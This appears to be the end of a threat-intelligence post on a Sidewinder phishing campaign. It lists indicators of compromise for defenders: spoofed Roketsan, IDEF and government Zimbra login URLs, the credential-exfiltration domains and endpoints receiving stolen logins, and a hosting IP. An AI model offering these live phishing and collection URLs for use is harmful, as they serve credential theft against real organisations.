https://drive-rokectsaans-com-tr-account-file.netlify.app/Roketsan Drivehttps://mailbox3-inbox1-bd.com/idef.php
https://idef2025-com-tr-files-drive-account.netlify.app/IDEF Secured File Systemhttps://mailbox3-inbox1-bd.com/idef11.php
https://mail-bof-gov-file-account-conf-files.netlify.app/?pdf=Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://drive-roketsans-com-tr-account-files.netlify.app/Roketsan Drivehttps://mailbox3-inbox1-bd.com/idef.php
https://mail-mod-gov-np-account-file-data[.]netlify[.]app/bof.htmlZimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://mail-dgfi-gov-bd-accounts-file-data-d.netlify.app/?pdf=ealb.gso2.protocol@dgfi.gov.bdZimbra Web Client Sign InN/A

Additional IOCs

IOC Type Description
mailbox3-inbox1-bd.com Domain Credential exfiltration endpoint used in POST requests from multiple spoofed government and defense login portals.
mailbox-inbox-bd.com Domain Alternate credential collection domain, also receiving POST requests from phishing pages mimicking Zimbra and secured file systems.
146.70.118.226 IP Address Hosting infrastructure linked to the Sidewinder phishing campaign, likely associated with the above credential exfiltration domains.

Related Posts:

Server-Side Phishing: How Credential  Theft Campaigns Are Hiding in Plain Sight
Apr 15, 2025

Phishing campaign evades detection with server-side logic. See how employee portals are targeted—and how defenders can uncover them. Learn more.

Server-Side Phishing: How Credential  Theft Campaigns Are Hiding in Plain Sight
Apr 15, 2025

Phishing campaign evades detection with server-side logic. See how employee portals are targeted—and how defenders can uncover them. Learn more.

Exposing Massive Phishing Scams Abusing Cloudflare Services
Nov 7, 2024

Discover how a shared Font Awesome kit on Cloudflare platforms exposes over 60,000 phishing links targeting Microsoft, DHL, and more. Learn more.

Exposing Massive Phishing Scams Abusing Cloudflare Services
Nov 7, 2024

Discover how a shared Font Awesome kit on Cloudflare platforms exposes over 60,000 phishing links targeting Microsoft, DHL, and more. Learn more.

APT36-Linked ClickFix Campaign Spoofs Indian Ministry of Defence, Targets Windows & Linux Users
May 5, 2025

APT36-style phishing campaign mimics India’s Ministry of Defence to drop malware on Windows and Linux via spoofed press releases and HTA payloads.

APT36-Linked ClickFix Campaign Spoofs Indian Ministry of Defence, Targets Windows & Linux Users
May 5, 2025

APT36-style phishing campaign mimics India’s Ministry of Defence to drop malware on Windows and Linux via spoofed press releases and HTA payloads.

Server-Side Phishing: How Credential  Theft Campaigns Are Hiding in Plain Sight
Apr 15, 2025

Phishing campaign evades detection with server-side logic. See how employee portals are targeted—and how defenders can uncover them. Learn more.

Exposing Massive Phishing Scams Abusing Cloudflare Services
Nov 7, 2024

Discover how a shared Font Awesome kit on Cloudflare platforms exposes over 60,000 phishing links targeting Microsoft, DHL, and more. Learn more.

APT36-Linked ClickFix Campaign Spoofs Indian Ministry of Defence, Targets Windows & Linux Users
May 5, 2025

APT36-style phishing campaign mimics India’s Ministry of Defence to drop malware on Windows and Linux via spoofed press releases and HTA payloads.